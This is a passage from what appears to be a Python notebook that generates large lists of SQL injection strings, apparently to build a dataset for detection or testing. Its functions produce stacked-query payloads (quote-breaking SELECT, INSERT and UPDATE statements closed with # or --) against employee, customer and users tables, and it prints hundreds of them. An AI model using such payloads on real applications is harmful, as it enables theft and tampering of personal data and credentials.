 '"; SELECT * FROM service#',
 '"; SELECT lname, email, fname FROM customer-- ',
 '"; SELECT * FROM users#',
 '"; SELECT tel, lname FROM customer#',
 '"; SELECT fname, nickname, address, employee_id, email FROM employee# ',
 '"; SELECT id_card, tel, graduation_certificate, lname, house_registration FROM employee#',
 '"; SELECT id_card, employee_id, nickname, prefixname, fname FROM employee-- ',
 '"; SELECT prefixname, nickname, lname, address, email, tel, work_background, employee_id FROM employee# ',
 '"; SELECT name FROM service#',
 '"; SELECT work_background, prefixname, tel, nickname FROM employee#',
 '"; SELECT price FROM service# ',
 '"; SELECT prefixname, email, work_background, id_card, fname, address, nickname, lname FROM employee# ',
 '"; SELECT price FROM service-- ',
 '"; SELECT * FROM customer# ',
 '"; SELECT work_background, lname, nickname, graduation_certificate, house_registration, prefixname, fname, address FROM employee#',
 '"; SELECT email, fname, house_registration FROM employee#',
 '"; SELECT lname FROM employee#',
 '"; SELECT username FROM users#',
 '"; SELECT * FROM employee# ',
 '"; SELECT prefixname, address, house_registration, nickname, id_card, fname FROM employee# ',
 '"; SELECT fname, work_background, id_card, house_registration, employee_id, address, prefixname, email, lname, tel FROM employee-- ',
 '"; SELECT username FROM users# ',
 '"; SELECT prefixname, graduation_certificate, id_card, fname, work_background, nickname, tel, email, lname, house_registration, employee_id FROM employee-- ',
 '"; SELECT tel, customer_id FROM customer-- ',
 '"; SELECT email, id_card, graduation_certificate FROM employee#',
 '"; SELECT * FROM customer-- ',
 '"; SELECT lname, email, customer_id, fname FROM customer# ',
 '"; SELECT id_card, employee_id FROM employee# ',
 '"; SELECT customer_id, lname FROM customer-- ',
 '"; SELECT lname, email, tel FROM customer# ',
 '"; SELECT customer_id FROM customer-- ',
 '"; SELECT tel, customer_id FROM customer#',
 '"; SELECT fname, tel, prefixname FROM employee# ',
 '"; SELECT customer_id, email FROM customer-- ',
 '"; SELECT lname, fname, tel FROM customer# ',
 '"; SELECT nickname, lname, work_background, prefixname, email, employee_id, graduation_certificate, house_registration, fname, tel FROM employee-- ',
 '"; SELECT id_card FROM employee# ',
 '"; SELECT work_background, email, address, lname, fname, house_registration FROM employee-- ',
 '"; SELECT lname, fname, email FROM customer-- ',
 '"; SELECT lname, tel, customer_id, email FROM customer# ',
 '"; SELECT email, tel FROM customer#',
 '"; SELECT work_background FROM employee# ',
 '"; SELECT tel, email, prefixname, house_registration, id_card, employee_id, work_background, fname, address, nickname FROM employee# ']

In [55]:
def randomInsertForSearch(table, table_value, last):
    gen=[]
    for i in range(200) :
        preStr =""
        typeOfValue=[]
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += '";'+" INSERT INTO " + random_table + "("
        numOfParam=random.randint(1, len(table_value[random_table])-1)
        for j in range(numOfParam) :
            while True:
                random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
                if random_table_value not in preStr:
                    typeOfValue.append(type_of_value[random_table_value])
                    break
                continue 
                
            preStr += random_table_value
            if j != numOfParam-1 :
                preStr += ", "
        preStr += ") VALUES("
        for j in range(numOfParam) :

            random_string=""
            first = typeOfValue.pop(0)
            if first == "tel":
                random_string = generate_random_string_tel()
            elif first == "price":
                random_string = generate_random_string_price()
            elif first == "id_card":
                random_string = generate_random_string_id_card()
            elif first == "str":
                random_string = generate_random_string_str()
            elif first == "both":
                random_string = generate_random_string_both()
                
            preStr += random_string
            if j != numOfParam-1 :
                preStr += ", "
        preStr += ")" + random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [56]:
randomInsertForSearch(table, table_value, last)

['"; INSERT INTO employee(nickname, graduation_certificate, tel, work_background, id_card, fname) VALUES("mNqF", "pXNgWkEB", 0706033343, "IhG8f", 1748220354762, "takVeuW")#',
 '"; INSERT INTO customer(customer_id) VALUES("ZnI3vnMR3vIkv")-- ',
 '"; INSERT INTO employee(prefixname, id_card, address, graduation_certificate, house_registration, work_background, fname, nickname, tel, lname) VALUES("VAQqgEJTjwl", 1909783587446, "XMQV6mrjSpNqSTh", "pu7Xh", "fnevCOIGDs8of", "LagWPCY9zV8WU3D", "KJBapJWivoKlPl", "xKjvLFu", 0480573039, "SwAFQhscgxASx")# ',
 '"; INSERT INTO service(price) VALUES(601)# ',
 '"; INSERT INTO employee(prefixname, nickname, address, lname, employee_id) VALUES("FvYnrgW", "LsnnJLcJuK", "TUEg7wUg0hteQX4", "HJkmPWcRRlcxM", "nGUxUghA4SM6")-- ',
 '"; INSERT INTO customer(lname, email, fname) VALUES("hGPvUX", "XPCPF", "NLJpGnHwp")-- ',
 '"; INSERT INTO users(username) VALUES("gSmLRCJdwmtYcyt")-- ',
 '"; INSERT INTO customer(email, customer_id) VALUES("CF7pY5S4G", "PjoItj")# ',
 '"; INSERT INTO customer(lname) VALUES("nUmNxTApNsMZxK")#',
 '"; INSERT INTO employee(nickname, fname, tel, employee_id, prefixname, graduation_certificate, id_card, work_background, email) VALUES("AWPvjeWwXWtLxrr", "gSFtOnK", 0863879248, "1N2CV", "oxazzBpFhrTGHyG", "ImehbCtnkzoQ2Rb", 1750825740900, "kc6xUX", "45868")#',
 '"; INSERT INTO users(password) VALUES("fBgs")-- ',
 '"; INSERT INTO employee(employee_id, fname, nickname) VALUES("1OjQMQBz", "WGHZChCKqAcDZL", "MvYNqQgJknKr")#',
 '"; INSERT INTO customer(email) VALUES("RS9meKkqRG")# ',
 '"; INSERT INTO service(name) VALUES("yJIspoVtrP")#',
 '"; INSERT INTO employee(address, email) VALUES("lDVgzc30R", "V4TBts5Pt")#',
 '"; INSERT INTO service(price) VALUES(551)# ',
 '"; INSERT INTO customer(customer_id, email, tel, fname) VALUES("pLm0gsN3", "ganYF", 0172775241, "RdEllCEkgbpWo")-- ',
 '"; INSERT INTO employee(house_registration) VALUES("GcBs8eFzoBmD")-- ',
 '"; INSERT INTO customer(lname, email, tel) VALUES("cfybiJd", "eViJmRcN", 0559294988)# ',
 '"; INSERT INTO employee(employee_id, address) VALUES("oUVaM3bbOjWmqor", "Ert3PxECrDpEw")# ',
 '"; INSERT INTO service(price) VALUES(347)-- ',
 '"; INSERT INTO employee(address, graduation_certificate, tel, lname, employee_id, house_registration, nickname, email, id_card) VALUES("iE55WTl", "2RkWVLpSdn", 0892129416, "otFoMbYdBVR", "JTI5Q", "ou08z9J43mZ", "xWuOvuPJZuQwOAr", "aMWsh2LWkqA", 1585385084883)# ',
 '"; INSERT INTO service(name) VALUES("jCnPsY")-- ',
 '"; INSERT INTO employee(house_registration, tel, fname, email) VALUES("jqbmUROY4Cp", 0906643998, "TZTGSKMd", "zvuOv1OKYzjch")# ',
 '"; INSERT INTO users(password) VALUES("vCgug60yGk")#',
 '"; INSERT INTO users(password) VALUES("PgOxNHM")-- ',
 '"; INSERT INTO customer(tel) VALUES(0733672158)-- ',
 '"; INSERT INTO customer(lname, email, customer_id) VALUES("vwpnrqXnYAnpCUB", "mXNbDdoEta", "Er99T7KtBZijrI")#',
 '"; INSERT INTO users(username) VALUES("bGUyecAki")#',
 '"; INSERT INTO service(name) VALUES("LgoujFuaGzooFu")-- ',
 '"; INSERT INTO employee(tel, fname) VALUES(0240654680, "iSkIGkOh")-- ',
 '"; INSERT INTO customer(tel) VALUES(0684416758)#',
 '"; INSERT INTO employee(id_card, address, employee_id, nickname, lname, prefixname) VALUES(1689852821217, "XNgcUdb4Woofb", "Sn45pb8", "UpsIQAtHWzE", "xGnmqi", "WCOsvWJEEXebRe")# ',
 '"; INSERT INTO users(password) VALUES("CfgC")#',
 '"; INSERT INTO users(password) VALUES("urQcTUJMvUKQNz")-- ',
 '"; INSERT INTO customer(email) VALUES("Ry4sDyfp")-- ',
 '"; INSERT INTO employee(graduation_certificate, fname) VALUES("6IEkCF4", "pJjTWBB")-- ',
 '"; INSERT INTO customer(fname, lname) VALUES("dgIKiym", "HIMpfW")-- ',
 '"; INSERT INTO users(username) VALUES("lWagKaMKnd")#',
 '"; INSERT INTO service(price) VALUES(397)# ',
 '"; INSERT INTO users(password) VALUES("Ado1iaB")-- ',
 '"; INSERT INTO employee(graduation_certificate, work_background, house_registration, nickname, fname, employee_id, email) VALUES("wNTj05fLHgzG", "uhSQWaeO6k5r", "WvpH", "MRfQjbPzuGgr", "WBdSrijAzGW", "PxtLNN", "A7GbxuMAKVf")# ',
 '"; INSERT INTO customer(tel, fname, email, lname) VALUES(0576885195, "xGLDJpmNAC", "XUWhc5qmy4z", "PfCRNBQwtWoaj")#',
 '"; INSERT INTO employee(nickname, graduation_certificate, tel, work_background, lname, house_registration, address, employee_id) VALUES("UGGOdL", "KyRswFbr2VTzM", 0880338607, "Gp41EjrTexv", "pXyOlaRe", "rCJG1FIoF9", "iL9M3x1zV2", "ssZKxwe6")# ',
 '"; INSERT INTO employee(id_card) VALUES(1980408592126)#',
 '"; INSERT INTO customer(lname, email, fname, tel) VALUES("ufPR", "jgmOwjsys", "AJbpmiPW", 0529094168)-- ',
 '"; INSERT INTO service(name) VALUES("vvAyyG")#',
 '"; INSERT INTO employee(address) VALUES("jq1BZmm")-- ',
 '"; INSERT INTO users(password) VALUES("oHlj4Y")#',
 '"; INSERT INTO customer(lname, tel, fname, customer_id) VALUES("zAPlmSlRgCoDZ", 0877439325, "JoNdNXJMuGhKYng", "XpBi7xz6")# ',
 '"; INSERT INTO users(username) VALUES("eDqZOUEwiA")-- ',
 '"; INSERT INTO service(price) VALUES(631)#',
 '"; INSERT INTO service(name) VALUES("YaAoeDdcNvVT")# ',
 '"; INSERT INTO users(password) VALUES("cxf7JfBCdtpw")# ',
 '"; INSERT INTO employee(employee_id, lname, graduation_certificate, address, email, prefixname, work_background) VALUES("I358u1v1sGKati", "AhvdBnVXqYewl", "foVR8i7KMxSA3c1", "v0dPed9LTK1ZsDe", "eykSlJCl", "bGlvSbZUOdcrH", "cOVL3he")# ',
 '"; INSERT INTO service(name) VALUES("hwzQjTyYtQKlN")#',
 '"; INSERT INTO customer(fname, lname) VALUES("kUUQkjNLnrcLWlJ", "kmbCxmgpyigBZ")# ',
 '"; INSERT INTO employee(tel, house_registration, id_card, graduation_certificate, fname, email) VALUES(0552418482, "v0FBBqayJBMg", 1610822926814, "2LSI8jjYW6u", "yQodYiEozVhljB", "PEV2ZGhzIiZxqnr")# ',
 '"; INSERT INTO employee(address, tel) VALUES("85Llqdp2b", 0914234855)# ',
 '"; INSERT INTO service(price) VALUES(373)#',
 '"; INSERT INTO service(price) VALUES(761)-- ',
 '"; INSERT INTO service(name) VALUES("IAGeulMBDZWNc")# ',
 '"; INSERT INTO service(price) VALUES(846)-- ',
 '"; INSERT INTO service(price) VALUES(173)# ',
 '"; INSERT INTO service(price) VALUES(474)#',
 '"; INSERT INTO customer(tel, fname) VALUES(0874126566, "kDYcGCsqiZWvx")#',
 '"; INSERT INTO employee(nickname, id_card, email, address) VALUES("HiBb", 1949401846946, "cpZUfek4FwgzZ", "9Gxh0K")# ',
 '"; INSERT INTO customer(fname, customer_id, lname, email) VALUES("ZFUJQvNedqrP", "aQWEOapC530A5", "NfSGQOn", "j5pblYHbTS")#',
 '"; INSERT INTO service(name) VALUES("cJoFnVDpxFxsmW")-- ',
 '"; INSERT INTO service(name) VALUES("iWOKXfngLCCbdo")# ',
 '"; INSERT INTO users(password) VALUES("S2X7mc84w5bM7T")#',
 '"; INSERT INTO service(price) VALUES(485)# ',
 '"; INSERT INTO service(name) VALUES("noElUzNELqS")#',
 '"; INSERT INTO service(price) VALUES(551)-- ',
 '"; INSERT INTO customer(lname, tel) VALUES("VdHWljBnDFo", 0678562139)#',
 '"; INSERT INTO service(name) VALUES("CQbfrBQcL")#',
 '"; INSERT INTO service(price) VALUES(534)# ',
 '"; INSERT INTO customer(fname, email) VALUES("ytJV", "AQclmhD")# ',
 '"; INSERT INTO customer(fname, lname, customer_id, email) VALUES("imXEWsJcC", "yASsdNCoeX", "zsq4FOGzDH82hHW", "uqtspIsYZ")# ',
 '"; INSERT INTO users(password) VALUES("kBlhGWTVNhK0KC")-- ',
 '"; INSERT INTO users(username) VALUES("jTZVBJ")-- ',
 '"; INSERT INTO service(price) VALUES(624)-- ',
 '"; INSERT INTO customer(email) VALUES("xe8rVV879CzmsPK")# ',
 '"; INSERT INTO users(password) VALUES("QlGjbXXs8Am")-- ',
 '"; INSERT INTO users(password) VALUES("pPiXY3hS0Dio")-- ',
 '"; INSERT INTO users(password) VALUES("h26aNLyW")# ',
 '"; INSERT INTO employee(house_registration, work_background, prefixname, employee_id, email, address, fname, graduation_certificate, id_card) VALUES("wD2b0Pfvu2rQ", "d67kfY", "rKioKeyEj", "s4f17etXE", "Q7eWt", "rVn4y", "maUuTWdoMQ", "qVshL33vB1", 1900561838351)-- ',
 '"; INSERT INTO service(price) VALUES(908)-- ',
 '"; INSERT INTO customer(tel) VALUES(0324563472)#',
 '"; INSERT INTO service(price) VALUES(391)-- ',
 '"; INSERT INTO employee(nickname) VALUES("sjpngFiPz")# ',
 '"; INSERT INTO users(username) VALUES("blVAsCjCjQN")# ',
 '"; INSERT INTO customer(email, lname) VALUES("gDb5XJ8", "nzrrzzeYH")# ',
 '"; INSERT INTO employee(email) VALUES("PNYIMHW7fMZrSZD")#',
 '"; INSERT INTO customer(fname) VALUES("QVibXlfuf")# ',
 '"; INSERT INTO customer(lname, customer_id) VALUES("wNPcdzdK", "hwY1smA8JdZ")#',
 '"; INSERT INTO users(username) VALUES("qNSDhVE")-- ',
 '"; INSERT INTO employee(work_background, tel, lname, graduation_certificate, id_card) VALUES("tBnJH", 0766420887, "luIwLrsBRQEWX", "wh2C1liR8I3", 1586670862833)-- ',
 '"; INSERT INTO customer(tel, customer_id, email) VALUES(0273590231, "GHfiNz", "yOK8PkHtx7Vu")# ',
 '"; INSERT INTO service(price) VALUES(050)-- ',
 '"; INSERT INTO users(password) VALUES("XxR61LwfoRUWOH1")-- ',
 '"; INSERT INTO customer(tel, fname) VALUES(0905528722, "qKEcsOVKERr")# ',
 '"; INSERT INTO service(name) VALUES("GNWPgta")# ',
 '"; INSERT INTO service(price) VALUES(188)-- ',
 '"; INSERT INTO users(password) VALUES("ZFPdy4Y")# ',
 '"; INSERT INTO service(name) VALUES("FOESI")# ',
 '"; INSERT INTO service(name) VALUES("okmG")-- ',
 '"; INSERT INTO employee(prefixname, work_background, id_card) VALUES("yooXhW", "ZOuol1iJAvcAJd", 1701272201046)# ',
 '"; INSERT INTO users(password) VALUES("PIwUSVVgYKQhH")# ',
 '"; INSERT INTO customer(tel, lname, fname, email) VALUES(0142339231, "wuDSNCNYXysq", "idmTfozJRsVT", "wLj8b")#',
 '"; INSERT INTO users(username) VALUES("lKPNIDOuEWniz")# ',
 '"; INSERT INTO users(username) VALUES("fkecarHitlXV")-- ',
 '"; INSERT INTO customer(fname, customer_id) VALUES("HWYcIDKJNeo", "J0F3b")-- ',
 '"; INSERT INTO customer(customer_id) VALUES("tWIWZRECe0")-- ',
 '"; INSERT INTO employee(prefixname, lname, nickname, graduation_certificate, house_registration, id_card, address, work_background, tel, email, fname) VALUES("JKNGWjXgswJ", "wQHGC", "AwUIKcFfpN", "YVux9jXG", "xDXu", 1962863408406, "jUpohxMx17wb3Hu", "QW86pkOsVrL", 0784079185, "BIAZ88Pf", "rBJDsJqXr")# ',
 '"; INSERT INTO customer(lname, email, tel, customer_id) VALUES("rqIfqJMWwjNazR", "LjlRR3itnm5wa", 0233730062, "DviwQzAJkBeRw")-- ',
 '"; INSERT INTO service(price) VALUES(670)#',
 '"; INSERT INTO users(password) VALUES("EgBaAwvEmXOm")-- ',
 '"; INSERT INTO service(name) VALUES("KgpZFa")-- ',
 '"; INSERT INTO employee(prefixname, lname, email, id_card, employee_id, fname, house_registration, address) VALUES("ejAtZajuXdZBg", "RmmeUmYEr", "DqF5KmsNsf3ra", 1661447005318, "nsE18Fc", "sPRTE", "icmSkkqpsw", "fOrsXnVCdqQ")-- ',
 '"; INSERT INTO service(price) VALUES(230)-- ',
 '"; INSERT INTO employee(address, lname, email, nickname, house_registration, work_background) VALUES("lnyYmy0MLaQYCmE", "FYocn", "PNmySfQPGgI5hDN", "HfVMi", "CPC1", "WUWhXcUtEyUY")-- ',
 '"; INSERT INTO customer(tel, email) VALUES(0670570287, "crDjGE")#',
 '"; INSERT INTO employee(fname, id_card, lname, email, tel, employee_id) VALUES("wWyX", 1562957479521, "uWXRMPATEQg", "t6OuHOp5xTZXXj", 0933820207, "B1IkSCYB")#',
 '"; INSERT INTO customer(tel, fname, email) VALUES(0100416877, "OnIH", "NRRPZCLNCH04ffF")-- ',
 '"; INSERT INTO employee(id_card, work_background) VALUES(1988104946012, "Sf2O7")-- ',
 '"; INSERT INTO service(name) VALUES("BVyssfJmNyIdbVL")#',
 '"; INSERT INTO customer(lname, email) VALUES("qHcH", "5Vh8ksWaDKR")-- ',
 '"; INSERT INTO employee(nickname, work_background, lname) VALUES("NgQsfXUXXJR", "YLg5F", "qiKJZdc")-- ',
 '"; INSERT INTO users(username) VALUES("iEpU")# ',
 '"; INSERT INTO users(username) VALUES("WqBLMKwojwvifl")#',
 '"; INSERT INTO customer(tel, customer_id, fname) VALUES(0312392139, "aFzYULJTsU2t", "BYybttnyrwBqDc")# ',
 '"; INSERT INTO employee(lname, graduation_certificate, id_card, nickname, employee_id, house_registration, fname, tel, address) VALUES("pGckFVdIcNqjGCM", "46re", 1870235730989, "WEIWqVbtvVVxMc", "ofcFEI", "bZIRUzk7", "tFfLqoEoHtpubL", 0914717466, "dDH80YC3V3")-- ',
 '"; INSERT INTO customer(tel, lname, email) VALUES(0795456768, "Ylfa", "swCijEfHrVc")# ',
 '"; INSERT INTO employee(employee_id, address) VALUES("JvHaZ68iX6", "JkVf")-- ',
 '"; INSERT INTO employee(prefixname, lname, id_card, address, email, graduation_certificate, work_background) VALUES("lbplqOq", "BpyoqJNkVFo", 1782703824213, "4AwXKRYhdy", "dwqHLWNnys", "mcV6Tnsd1nbw", "dHnxTQf")-- ',
 '"; INSERT INTO service(price) VALUES(168)#',
 '"; INSERT INTO employee(address, id_card, email, employee_id, fname) VALUES("kn7lX2", 1671519019551, "7BCzTBi0bb5BJ", "0SHq9XN", "SYQoeTzgLlHf")-- ',
 '"; INSERT INTO users(username) VALUES("xCTQNMYxKIDZv")#',
 '"; INSERT INTO service(name) VALUES("XdhLOUZZw")-- ',
 '"; INSERT INTO users(username) VALUES("fhyxKgrUL")#',
 '"; INSERT INTO service(name) VALUES("vzDdMnRyqc")#',
 '"; INSERT INTO users(password) VALUES("rkAhuLxJ3Nthyg8")-- ',
 '"; INSERT INTO customer(tel, fname) VALUES(0125669733, "NnzhCM")#',
 '"; INSERT INTO customer(tel, fname, customer_id, lname) VALUES(0645127884, "sGGplG", "VRs2NjIWMoNq0XO", "eQcJ")#',
 '"; INSERT INTO users(password) VALUES("faLsjLbA")-- ',
 '"; INSERT INTO service(name) VALUES("hmqL")-- ',
 '"; INSERT INTO customer(customer_id) VALUES("lLo5T4QDM")#',
 '"; INSERT INTO users(password) VALUES("CDantL")-- ',
 '"; INSERT INTO customer(fname, email) VALUES("oTEg", "vi0el5h")-- ',
 '"; INSERT INTO employee(prefixname, work_background, email, lname, employee_id, address, nickname, fname, graduation_certificate) VALUES("SzoZeaSYtD", "qBe0", "IE5pV", "YSkIjORGgmfCtls", "DpqRlityTkp", "BljHMDGOEJx", "NmTsEaxyfF", "rOLgvLxYZ", "QaIt")# ',
 '"; INSERT INTO employee(employee_id) VALUES("8Tv14YZXxfKuR")-- ',
 '"; INSERT INTO employee(nickname, id_card, prefixname, lname, tel) VALUES("EFezXl", 1647456730106, "OvItpvKNt", "oMyHNbuOpewVBA", 0488015445)-- ',
 '"; INSERT INTO customer(customer_id) VALUES("RFqavbb0arI")# ',
 '"; INSERT INTO employee(address, graduation_certificate, lname, email, prefixname, work_background, employee_id, house_registration, tel, fname, id_card) VALUES("gkreQQQ", "isVznAIV", "xUurfRaqUMYeBp", "GzO8fMavvf", "pGQOlPUx", "Q40XIv4RR377g", "EEVM6paMn", "HGOVUefHUj", 0141160763, "tIGHqUyizVAvvDg", 1935457392307)-- ',
 '"; INSERT INTO customer(customer_id, email) VALUES("cDRjz1Z4sC", "iZ1CxrRd")# ',
 '"; INSERT INTO service(price) VALUES(558)# ',
 '"; INSERT INTO users(username) VALUES("THWorFQzEhcZ")#',
 '"; INSERT INTO service(name) VALUES("vnImDh")# ',
 '"; INSERT INTO customer(fname, tel) VALUES("zmHBsoQalCARVEw", 0682131178)-- ',
 '"; INSERT INTO users(username) VALUES("wNTwa")#',
 '"; INSERT INTO users(username) VALUES("lOuXcQziHYOlJ")# ',
 '"; INSERT INTO users(username) VALUES("jbTgiIU")#',
 '"; INSERT INTO service(price) VALUES(848)# ',
 '"; INSERT INTO customer(fname, customer_id) VALUES("RWOmhKFewAF", "F8cn3uq")-- ',
 '"; INSERT INTO users(username) VALUES("Nwxu")#',
 '"; INSERT INTO users(password) VALUES("zkCnl8")# ',
 '"; INSERT INTO users(password) VALUES("cVZIq")#',
 '"; INSERT INTO employee(email) VALUES("u6mBXOyTjWyLf")# ',
 '"; INSERT INTO employee(employee_id, work_background, id_card, lname, email, house_registration, fname, prefixname, address, tel) VALUES("Jr2O94", "O0nhkKgO8", 1555119498374, "YVTQmRbdK", "4PUgaPFXlhlP", "UuaVVUv", "ULTFhyItt", "NhZWc", "5ptwSD9rkYfXw", 0113831293)-- ',
 '"; INSERT INTO users(username) VALUES("InpYRxzrz")# ',
 '"; INSERT INTO employee(id_card, address, house_registration, employee_id) VALUES(1669812681610, "psJHh4Csm", "aiHmZJV", "dssaVQ")# ',
 '"; INSERT INTO employee(house_registration, nickname, graduation_certificate, fname, address, work_background, employee_id, prefixname) VALUES("Qz9YEh1Q", "EuVkpuLBde", "vTISYmEzqN", "BGdu", "fd6RZWP2f", "GIKuDnF3", "AsY1K2vy", "cLjslu")# ',
 '"; INSERT INTO users(password) VALUES("jDguuV7eJ3LpN")#',
 '"; INSERT INTO users(username) VALUES("IZpRszCR")-- ',
 '"; INSERT INTO service(name) VALUES("yOtdorRnkPx")-- ',
 '"; INSERT INTO service(price) VALUES(413)-- ',
 '"; INSERT INTO employee(address, employee_id, tel, email, prefixname, lname, work_background, graduation_certificate) VALUES("15TsEV31s8G0O", "sk0JaXLS", 0218483537, "V3enbyK", "rhGClKN", "tPjaFHijuaASQi", "4syilRhuP6jhEV", "BlDiasc")-- ',
 '"; INSERT INTO employee(tel, fname, nickname, prefixname, email) VALUES(0114867783, "slhWp", "tWrjJYhjScz", "Sqtmis", "YROb")-- ',
 '"; INSERT INTO users(password) VALUES("6T0Pgs2r9m3x")# ',
 '"; INSERT INTO customer(fname, email, lname, tel) VALUES("zDvHttKVQjOI", "6Q0rRH3yyB8v", "AiMDYoQiKjWz", 0898253600)# ',
 '"; INSERT INTO users(password) VALUES("tYhd")# ',
 '"; INSERT INTO employee(nickname, address) VALUES("tuoTkdluV", "ZI90Eyib")#',
 '"; INSERT INTO users(password) VALUES("AtHXDoKokOG3jPh")# ',
 '"; INSERT INTO employee(nickname, graduation_certificate, work_background, tel, house_registration, prefixname) VALUES("DfvI", "fGCNoiYR", "iHr3YxWsJ", 0957751581, "mU2tBQOrfrXP5n2", "gDuqDCj")-- ',
 '"; INSERT INTO service(name) VALUES("VlrJSr")-- ',
 '"; INSERT INTO service(name) VALUES("ukdOGcfkw")-- ',
 '"; INSERT INTO customer(lname, tel, customer_id, email) VALUES("XsUC", 0243114060, "TdmFJd", "1c6cM")# ',
 '"; INSERT INTO service(name) VALUES("YuWHYSGWVpY")-- ',
 '"; INSERT INTO employee(address, email, employee_id, lname, graduation_certificate, prefixname, nickname, id_card, fname) VALUES("IbvupZgjrtR", "vSkuAM", "9xEvb", "jmTdmD", "VsAPDftp", "nqahotnQNWah", "woIXbgEWsTweD", 1795152097215, "WfVJlMsFMhgC")# ',
 '"; INSERT INTO customer(email, customer_id, tel) VALUES("9iCivmo5", "xfH9v", 0534804314)# ',
 '"; INSERT INTO customer(email, lname, fname) VALUES("C8QtNzJ1", "KTWeQgGx", "TZzWbvDbaASKkC")# ',
 '"; INSERT INTO customer(email) VALUES("9xtTLu")#',
 '"; INSERT INTO employee(tel, house_registration, fname, prefixname, work_background, graduation_certificate, lname) VALUES(0256631613, "giWI", "pguKbg", "GuZinZF", "Rv8oB4J", "ynFdB5R", "fGXUvPPgZnjTU")-- ',
 '"; INSERT INTO customer(fname, customer_id) VALUES("mdzVhbleZUiSM", "YK5gCueboobskJJ")-- ',
 '"; INSERT INTO employee(house_registration, tel, employee_id) VALUES("Sy6NcsxeqdhskR", 0111052332, "4OqytbeU")#',
 '"; INSERT INTO employee(email, house_registration, work_background, address, lname, fname, prefixname, employee_id, tel, nickname, id_card) VALUES("Y9rlZ", "hjY90i4ZkO9dqF5", "WSkJ04G2Y7wyY", "oLsKB", "USEeMujMWw", "KQymbVCRnWhTDx", "DnsMvWWgwE", "dSnGTZ3k0O", 0130698210, "tQSyxmb", 1527870497708)-- ',
 '"; INSERT INTO service(name) VALUES("IDrmwBkuzwdR")# ',
 '"; INSERT INTO users(username) VALUES("nGhWu")#',
 '"; INSERT INTO users(username) VALUES("aEByAIXifd")#']

In [51]:
def randomUpdateForSearch(table, table_value, last):
    gen=[]
    for i in range(200) :
        preStr =""
        typeOfValue=[]
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += '";' + " UPDATE " + random_table + " SET "
        numOfParam=random.randint(1, len(table_value[random_table])-1)
        for j in range(numOfParam) :
            while True:
                random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
                if random_table_value not in preStr:
                    typeOfValue.append(type_of_value[random_table_value])
                    break
                continue 
            
            random_string=""
            first = typeOfValue.pop(0)
            if first == "tel":
                random_string = generate_random_string_tel()
            elif first == "price":
                random_string = generate_random_string_price()
            elif first == "id_card":
                random_string = generate_random_string_id_card()
            elif first == "str":
                random_string = generate_random_string_str()
            elif first == "both":
                random_string = generate_random_string_both()

            preStr += random_table_value + " = " + random_string
            if j != numOfParam-1 :
                preStr += ", "
        random_table_value2=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
        first2 = type_of_value[random_table_value2]

        random_string2=""
        if first2 == "tel":
            random_string2 = generate_random_string_tel()
        elif first2 == "price":
            random_string2 = generate_random_string_price()
        elif first2 == "id_card":
            random_string2 = generate_random_string_id_card()
        elif first2 == "str":
            random_string2 = generate_random_string_str()
        elif first2 == "both":
            random_string2 = generate_random_string_both()
            
        preStr += " WHERE " + random_table_value2 + " = " + random_string2 +random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
        
    return gen

In [52]:
randomUpdateForSearch(table, table_value, last)

['"; UPDATE customer SET fname = "IKJXmnGDmE" WHERE email = "KDF3wVZ3x5nq2DW"#',
 '"; UPDATE employee SET tel = 0983959544 WHERE tel = 0167644426# ',
 '"; UPDATE customer SET tel = 0255032114, fname = "mXxfiMlgJkt" WHERE fname = "XFhUcAba"-- ',
 '"; UPDATE service SET price = 240 WHERE name = "rVDvvfoIOnzHgb"#',
 '"; UPDATE employee SET tel = 0771623496, nickname = "IMLvudJl", address = "aKSlxX3zXVo4fOI", fname = "DjnnGpXhOPNJNiS", prefixname = "hzBCTKsPsPVRBWt", house_registration = "afDhQFusBHKgSN", work_background = "TGHbA" WHERE id_card = 1768712073649#',
 '"; UPDATE employee SET address = "mtxGHG", employee_id = "JFtjXBoS7", fname = "GsuGodAEpvVMy", lname = "FEirxOdeIuIXQUB" WHERE graduation_certificate = "0oZBTEdHjFCzz0"# ',
 '"; UPDATE service SET price = 326 WHERE price = 831-- ',
 '"; UPDATE employee SET employee_id = "cSyz127fxC5a3Gc", work_background = "5cnI", email = "7YGVa0u6A8lso" WHERE graduation_certificate = "kwN2cB2u8Jwc"-- ',
 '"; UPDATE employee SET graduation_certificate = "9QSkh" WHERE tel = 0457442401#',
 '"; UPDATE employee SET lname = "NtgNnR", house_registration = "eUHz", tel = 0812809717, nickname = "meotjc", prefixname = "JOkEH", address = "segWmYb", email = "gXishy64fUTaH", work_background = "nFXH3gHt9zE5" WHERE house_registration = "k0OMFQgLddfosSS"-- ',
 '"; UPDATE employee SET fname = "qwUpu", lname = "FeTMqrrvjjcN", email = "ehwHZ", graduation_certificate = "j4Jl", tel = 0922206033 WHERE nickname = "eSPGLGeL"-- ',
 '"; UPDATE users SET password = "rCPzBNv" WHERE username = "pPInssb"#',
 '"; UPDATE service SET price = 676 WHERE price = 603-- ',
 '"; UPDATE customer SET fname = "yqelmrtYqT" WHERE customer_id = "98QX"#',
 '"; UPDATE employee SET address = "oykKYgux0teLd", graduation_certificate = "rkcN", house_registration = "HWTUle2", prefixname = "YNoRluy", nickname = "mgKGFhTSv", work_background = "GlUYLJmyW", id_card = 1894229057731 WHERE graduation_certificate = "qCzHFPZsim1"#',
 '"; UPDATE employee SET lname = "HRlcHHXK", address = "7jILLsCJ1t", nickname = "sqnwZNhM", tel = 0749502062, employee_id = "29hMJthwEf7c", id_card = 1889516205669, fname = "RXiejWL", prefixname = "gJhZIHwSNaQzLkr", graduation_certificate = "bqNXSU2v" WHERE house_registration = "nMcvVQF"# ',
 '"; UPDATE customer SET fname = "emwFMCI", email = "Dgo84gaSF4GvF", customer_id = "u5A9JS" WHERE tel = 0280825516# ',
 '"; UPDATE customer SET customer_id = "ZAMqth3brNig8O", lname = "ExlgGvV", tel = 0567216548, email = "2MY9ITK4vwAMS" WHERE tel = 0637484489-- ',
 '"; UPDATE employee SET nickname = "sJaYrii", fname = "pbdveYiGBIRh" WHERE email = "Ix9KC"-- ',
 '"; UPDATE service SET name = "sEiw" WHERE price = 719-- ',
